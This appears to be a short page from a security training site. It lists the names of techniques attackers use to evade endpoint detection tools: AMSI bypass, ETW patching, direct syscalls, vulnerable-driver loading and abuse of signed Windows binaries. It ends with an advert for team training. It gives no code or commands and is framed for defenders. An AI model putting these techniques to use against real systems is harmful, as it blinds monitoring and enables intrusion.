Read as
Last updated: April 29, 2026
Modern EDRs (CrowdStrike, SentinelOne, Defender for Endpoint, Carbon Black) hook into kernel and user space. Attackers evolved evasion. Knowing the techniques helps defenders evaluate detection coverage.
Modern EDRs (CrowdStrike, SentinelOne, Defender for Endpoint, Carbon Black) hook into kernel and user space. Attackers evolved evasion. Knowing the techniques helps defenders evaluate detection coverage.
Common evasion techniques
- Process injection variants — APC injection, atom bombing, CTRL injection, NtMapViewOfSection. Each evades signature-based hooks.
- AMSI bypass — disable Microsoft’s anti-malware scan interface in-process. Many published bypasses; vendors patch; attackers find new.
- ETW patching — disable Event Tracing for Windows. Loss of telemetry = blind defenders.
- Direct syscalls — bypass user-mode hooks by calling kernel directly via SYSCALL instruction.
- BYOVD (Bring Your Own Vulnerable Driver) — load a legitimately-signed but vulnerable driver, exploit it for kernel access. EDRtoBlackEDR-style.
- Living off the Land — use signed Windows binaries (LOLBINs) — certutil, mshta, regsvr32, bitsadmin.
Want this for your team?
Custom team training + practitioner advisory
Beyond the free academy — we run private workshops, vCISO advisory, and red-team exercises tailored to your stack. For Indian SMBs scaling past their first hire.
Book team training call
Replies in 4 working hrs · India-only · Senior consultants